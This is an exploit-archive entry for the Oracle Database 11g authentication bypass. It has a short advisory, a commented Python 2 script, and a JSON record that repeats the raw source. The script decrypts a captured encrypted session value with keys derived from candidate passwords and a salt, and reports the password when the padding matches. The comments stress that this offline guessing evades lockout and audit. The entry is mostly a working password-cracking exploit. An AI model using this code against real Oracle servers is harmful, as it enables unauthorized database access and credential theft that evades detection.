ID EXPLOITPACK:049162A0F7241C2E0149611DFC4EC651
Type exploitpack
Reporter Esteban Martinez Fayo
Modified 2015-01-05T15:36:30
Description
Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.
An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database.
This vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.
#-*-coding:utf8 -*-
import hashlib
from Crypto.Cipher import AES
def decrypt(session, salt, password):
    """Decrypt ``session`` with a key derived from ``password`` and ``salt``.

    The key is the 20-byte SHA-1 digest of ``password + salt`` followed by
    four zero bytes, giving the 24 bytes of an AES-192 key. Nothing but the
    password guess and the salt goes into the key, so anyone holding the
    salt and the encrypted session value can test guesses without contacting
    the server.

    Args:
        session: raw (not hex) ciphertext; the caller passes 48 bytes.
        salt: raw salt bytes; the caller passes 10 bytes.
        password: candidate password as a byte string.

    Returns:
        The AES-CBC decryption of ``session`` as a byte string.
    """
    digest = hashlib.sha1(password + salt).digest()
    # Pad the 20-byte digest with zeros up to the 24-byte key length.
    aes_key = digest + '\x00\x00\x00\x00'
    # NOTE(review): no IV is passed, so the IV is whatever the installed
    # Crypto library uses by default - confirm for the version in use. In CBC
    # only the first 16-byte block of the output depends on the IV.
    return AES.new(aes_key, AES.MODE_CBC).decrypt(session)
# Python 2 only: relies on the print statement and str.decode('hex').
#
# Everything below runs locally on two hard-coded values (presumably taken
# from one authentication exchange - confirm against the advisory). No
# connection to the database is made, so this guessing is invisible to
# failed-login counters, account lockout and server-side audit records.

# Encrypted session value, hex-encoded: 96 hex digits = 48 bytes.
session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'

# Salt, hex-encoded: 20 hex digits = 10 bytes.
salt_hex = 'A7193E546377EC56639E'

# Candidate passwords to test.
passwords = ['test','password','oracle','demo']

# The hex decoding does not depend on the candidate, so do it once.
session_raw = session_hex.decode('hex')
salt_raw = salt_hex.decode('hex')

# Eight bytes of value 8: the padding that fills a 40-byte payload up to
# 48 bytes. This fixed tail is what makes a correct guess recognisable.
known_padding = '\x08\x08\x08\x08\x08\x08\x08\x08'

for password in passwords:
    session_id = decrypt(session_raw, salt_raw, password)
    shown = session_id.encode('hex')
    print 'Decrypted session_id for password "%s" is %s' % (password, shown)
    # A wrong key yields effectively random bytes in the last 8 positions.
    if session_id[40:] != known_padding:
        continue
    print 'PASSWORD IS "%s"' % password
    break
{"lastseen": "2020-04-01T19:04:39", "references": [], "description": "\nOracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. \nAn attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database. \nThis vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.", "edition": 1, "reporter": "Esteban Martinez Fayo", "exploitpack": {"type": "clientside", "platform": "windows"}, "published": "2015-01-05T15:36:30", "title": "Oracle-Database-Authentication", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:39", "rev": 2}, "score": {"value": 2.0, "vector": "NONE", "modified": "2020-04-01T19:04:39", "rev": 2}, "vulnersScore": 2.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-05T15:36:30", "id": "EXPLOITPACK:049162A0F7241C2E0149611DFC4EC651", "href": "", "viewCount": 1, "sourceData": "#-*-coding:utf8 -*-\n \nimport hashlib\nfrom Crypto.Cipher import AES\n \ndef decrypt(session,salt,password):\n pass_hash = hashlib.sha1(password+salt)\n \n #......... ..... ..... .......... .. 24 ....\n key = pass_hash.digest() + '\\x00\\x00\\x00\\x00'\n decryptor = AES.new(key,AES.MODE_CBC)\n plain = decryptor.decrypt(session)\n return plain\n \n #............. ........... ...... 48 ....\nsession_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'\n \n#.... 10 ....\nsalt_hex = 'A7193E546377EC56639E'\n \npasswords = ['test','password','oracle','demo']\n \n for password in passwords:\n session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password)\n print 'Decrypted session_id for password \"%s\" is %s' % (password,session_id.encode('hex'))\n if session_id[40:] == '\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08':\n print 'PASSWORD IS \"%s\"' % password\n break", "cvss": {"score": 0.0, "vector": "NONE"}}
{}